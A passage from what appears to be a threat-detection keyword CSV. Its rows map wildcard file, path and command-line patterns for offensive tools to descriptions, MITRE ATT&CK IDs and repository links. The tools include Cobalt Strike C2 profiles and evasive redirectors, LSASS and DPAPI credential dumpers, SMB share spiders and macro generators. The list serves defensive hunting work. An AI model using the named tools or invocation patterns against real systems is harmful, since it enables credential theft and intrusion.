tools,https://github.com/nccgroup/BurpSuiteHTTPSmuggler,1,1,N/A,N/A,7,668,108,2019-05-04T06:15:42Z,2018-07-03T07:47:58Z -*malicious.csproj*,offensive_tool_keyword,PowerLessShell,PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.,T1218.010 - T1059 - T1105 - T1047 - T1055,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/Mr-Un1k0d3r/PowerLessShell,1,1,N/A,N/A,10,1393,253,2023-03-23T13:30:14Z,2017-05-29T23:03:52Z -*malicious.dll*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,1,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*MaliciousMacroGenerator*,offensive_tool_keyword,MaliciousMacroGenerator,Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape mechanism.,T1027 - T1564 - T1127 - T1059 - T1562,TA0002 - TA0008 - TA0003,N/A,N/A,Defense Evasion,https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator,1,0,N/A,N/A,9,808,210,2019-04-17T19:47:38Z,2016-09-21T23:18:14Z -*MaliciousMacroMSBuild-master*,offensive_tool_keyword,MaliciousMacroMSBuild,Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.,T1059.001 - T1059.003 - T1127 - T1027.002,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/MaliciousMacroMSBuild,1,1,N/A,8,5,488,117,2019-08-06T08:16:05Z,2018-04-09T23:16:30Z -*Malleable C2 Files*,offensive_tool_keyword,cobaltstrike,Cobaltstrike toolkit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/1135/1135-CobaltStrike-ToolKit,1,1,N/A,10,10,149,40,2021-03-29T07:00:00Z,2019-02-22T09:36:44Z -*Malleable PE/Stage*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*malleable_redirector.py*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*malleable_redirector_hidden_api_endpoint*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*Malleable-C2-Profiles*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Malleable-C2-Randomizer*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*Malleable-C2-Randomizer*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 
- T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*malleable-c2-randomizer.py*,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,1,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -*MalleableProfileB64*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,1,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*MalleableProfiles.vue*,offensive_tool_keyword,empire,Starkiller is a Frontend for Powershell Empire. 
It is a web application written in VueJS,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Starkiller,1,1,N/A,N/A,10,1126,186,2023-08-27T18:33:49Z,2020-03-09T05:48:58Z -*malleable-redirector-config*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*MalSCCM.exe*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,1,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*MalSCCM-main*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,1,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*malware.NewConfig*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*malwaredllc*,offensive_tool_keyword,byob,BYOB is an open-source post-exploitation framework for students. Pre-built C2 server Custom payload generator 12 post-exploitation modules It is designed to allow students and developers to easily implement their own code and add cool new features without having to write a C2 server or Remote Administration Tool from scratch,T1024 - T1059 - T1064 - T1002 - T1071,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/malwaredllc/byob,1,0,N/A,N/A,10,8504,2072,2023-10-02T14:55:32Z,2017-12-18T09:10:12Z -*man_in_the_browser.json*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*man_spider.manspider:main*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*ManagedEasyHook.dll*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*manageengine_adselfservice_plus_cve_2022_28810.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*manageengine_xnode/CVE*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*manager/keepass.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*manager/mRemoteNG.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*mandiant/DueDLLigence*,offensive_tool_keyword,DueDLLigence,Shellcode runner framework for application whitelisting bypasses and DLL side-loading,T1055.012 - T1218.011,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/mandiant/DueDLLigence,1,1,N/A,10,5,441,90,2023-06-02T14:24:43Z,2019-10-04T18:34:27Z -*mandiant/gocrack*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,1,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*mandllinject *,offensive_tool_keyword,cobaltstrike,Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tomcarver16/BOF-DLL-Inject,1,0,N/A,10,10,140,22,2020-09-03T23:24:31Z,2020-09-03T23:04:30Z -*manspider * -d * -u * -p *,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*manspider */24 -f *,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*manspider --threads * -d * -u * -H * --content admin*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*manspider*--loot-dir*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*manspider*--sharenames*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*manspider.py*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,1,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*manspider.spiderling*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*manspider_scan*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*MANSPIDER-master*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,1,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*map_payload_dll*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*map-get-tls-alternative-names *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*mapper_cve_exploit.py*,offensive_tool_keyword,Xerror,fully automated pentesting tool,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Chudry/Xerror,1,1,N/A,N/A,5,458,106,2022-12-08T04:33:03Z,2019-08-16T21:20:52Z -*masky_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*masscan -c *,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,0,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -*masscan --nmap*,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,0,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -*masscan -p*,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,0,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -*masscan* -p*,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,0,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -*massdns -r *.txt*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*master/bootkit/src*,offensive_tool_keyword,bootkit-rs,Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus),T1542.004 - T1067.002 - T1012 - T1053.005 - T1057,TA0002 - TA0040 - TA0003 - TA0001,N/A,N/A,Defense Evasion,https://github.com/memN0ps/bootkit-rs,1,1,N/A,N/A,5,448,54,2023-09-12T07:23:15Z,2023-04-11T03:53:15Z -*master/EncryptedZIP*,offensive_tool_keyword,EncryptedZIP,Compresses a directory or file and then encrypts the ZIP file with 